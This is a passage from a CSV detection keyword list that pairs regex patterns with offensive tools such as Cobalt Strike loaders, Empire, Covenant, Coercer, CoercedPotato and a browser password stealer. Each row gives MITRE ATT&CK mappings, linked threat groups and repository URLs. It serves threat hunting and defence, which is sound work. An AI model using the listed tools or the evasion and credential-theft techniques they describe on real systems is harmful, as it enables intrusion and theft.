LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","38555" "*cobaltstrike-dist.tgz*",".{0,1000}cobaltstrike\-dist\.tgz.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","38556" 
"*cobaltstrike-nemesis-connector*",".{0,1000}cobaltstrike\-nemesis\-connector.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","38557" "*CobblePot59/ADcheck*",".{0,1000}CobblePot59\/ADcheck.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","1","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","38558" "*cobbr/Covenant*",".{0,1000}cobbr\/Covenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38559" "*cobbr/Elite*",".{0,1000}cobbr\/Elite.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38560" "*cobbr/PSAmsi*",".{0,1000}cobbr\/PSAmsi.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","38561" "*cobbr/SharpSploit*",".{0,1000}cobbr\/SharpSploit.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","38562" "*code_execution/*.dll*",".{0,1000}code_execution\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38567" "*code_execution/*.exe*",".{0,1000}code_execution\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38568" "*code_execution/*.ps1*",".{0,1000}code_execution\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38569" "*Coded by LimerBoy <3*",".{0,1000}Coded\sby\sLimerBoy\s\<3.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","38570" "*coded by PlayBit*",".{0,1000}coded\sby\sPlayBit.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by 
ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","38571" "*CodeExec-D37DA402-3829-492F-90D0-8EC3909514EB.json*",".{0,1000}CodeExec\-D37DA402\-3829\-492F\-90D0\-8EC3909514EB\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","38572" "*Codejock Software/Xtreme Toolkit Pro*",".{0,1000}Codejock\sSoftware\/Xtreme\sToolkit\sPro.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","38573" "*Codejock Software\Xtreme Toolkit Pro*",".{0,1000}Codejock\sSoftware\\Xtreme\sToolkit\sPro.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#registry","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","38574" "*CodeLoad(shellcode)*",".{0,1000}CodeLoad\(shellcode\).{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - 
Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Axx8/ShellCode_Loader","1","0","N/A","N/A","10","10","412","47","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z","38575" "*codeLoader/codeLoader.*",".{0,1000}codeLoader\/codeLoader\..{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","38577" "*codesiddhant/jasmin-ransomware*",".{0,1000}codesiddhant\/jasmin\-ransomware.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","38578" "*codewatchorg/bypasswaf*",".{0,1000}codewatchorg\/bypasswaf.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/codewatchorg/bypasswaf","1","1","N/A","network exploitation tool","N/A","4","331","104","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z","38579" "*codewatchorg/sqlipy*",".{0,1000}codewatchorg\/sqlipy.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation 
tool","https://github.com/codewatchorg/sqlipy","1","1","N/A","network exploitation tool","N/A","3","254","92","2024-06-19T23:38:41Z","2014-09-22T03:25:42Z","38580" "*codewhitesec/apollon*",".{0,1000}codewhitesec\/apollon.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","38581" "*codewhitesec/daphne*",".{0,1000}codewhitesec\/daphne.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","N/A","8","1","17","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z","38582" "*codewhitesec/Lastenzug*",".{0,1000}codewhitesec\/Lastenzug.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","1","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","38583" "*coerce machine account authentication via MS-DFSNM NetrDfsRemoveStdRoot()*",".{0,1000}coerce\smachine\saccount\sauthentication\svia\sMS\-DFSNM\sNetrDfsRemoveStdRoot\(\).{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","Dispossessor","Exploitation tool","https://github.com/Wh04m1001/DFSCoerce","1","0","N/A","N/A","10","8","769","98","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z","38584" "*CoercedPotato spawn *",".{0,1000}CoercedPotato\sspawn\s.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - 
T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","38585" "*CoercedPotato.cpp*",".{0,1000}CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","38586" "*CoercedPotato.exe*",".{0,1000}CoercedPotato\.exe.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","38587" "*CoercedPotato.exe*",".{0,1000}CoercedPotato\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","38588" "*CoercedPotato.sln*",".{0,1000}CoercedPotato\.sln.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","38589" 
"*CoercedPotato-master*",".{0,1000}CoercedPotato\-master.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","38590" "*CoercedPotatoRDLL-main*",".{0,1000}CoercedPotatoRDLL\-main.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","38591" "*CoercePotato coerce*",".{0,1000}CoercePotato\scoerce.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","38592" "*Coercer coerce*",".{0,1000}Coercer\scoerce.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38593" "*coercer -d * -u *",".{0,1000}coercer\s\-d\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - 
T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38594" "*Coercer fuzz*",".{0,1000}Coercer\sfuzz.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38595" "*Coercer scan*",".{0,1000}Coercer\sscan.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38596" "*coercer.core*",".{0,1000}coercer\.core.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38597" "*coercer.methods*",".{0,1000}coercer\.methods.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38598" 
"*coercer.models*",".{0,1000}coercer\.models.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38599" "*coercer.network*",".{0,1000}coercer\.network.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38600" "*coercer.network.DCERPCSession*",".{0,1000}coercer\.network\.DCERPCSession.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38601" "*coercer.network.smb*",".{0,1000}coercer\.network\.smb.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38602" "*Coercer.py *",".{0,1000}Coercer\.py\s.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - 
TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38603" "*coercer.structures*",".{0,1000}coercer\.structures.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38604" "*coercer/core/loader*",".{0,1000}coercer\/core\/loader.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38605" "*coercer_check*",".{0,1000}coercer_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38606" "*coff_definitions.h*",".{0,1000}coff_definitions\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
